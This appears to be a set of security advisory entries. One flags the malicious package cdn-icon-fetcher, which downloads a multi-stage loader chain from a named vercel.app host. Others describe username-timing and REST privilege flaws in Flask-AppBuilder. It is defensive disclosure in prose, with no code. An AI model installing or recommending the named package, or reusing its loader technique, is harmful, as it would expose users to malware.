cdn-icon-fetcher is a Malicious package.

Affected versions of this package are vulnerable to Embedded Malicious Code. Once this package is installed and executed, it downloads a Javascript file from a cdn-static-icons.vercel.app URL, which appears to be an image hosting site. However, by using a specific custom header, as described in the library, the JavaScript file is downloaded as a first-stage loader. This loader subsequently downloads a .npl file, which acts as a second-stage loader written in Python. Ultimately, a third Python file, which is the actual payload and referenced in a specific Medium article, is executed.

Flask-AppBuilder is a simple and rapid application development framework, built on top of Flask. includes detailed security, auto CRUD generation for your models, google charts and much more.

Affected versions of this package are vulnerable to Information Exposure due to observable response discrepancies. This vulnerability allows unauthenticated attackers to determine existing usernames by measuring server response times during login attempts.

Affected versions of this package are vulnerable to Improper Privilege Management due to improper privilege management in a REST interface. An attacker can access unauthorized resources by knowing the resource ID.

Note: This is only exploitable if the attacker is a registered user.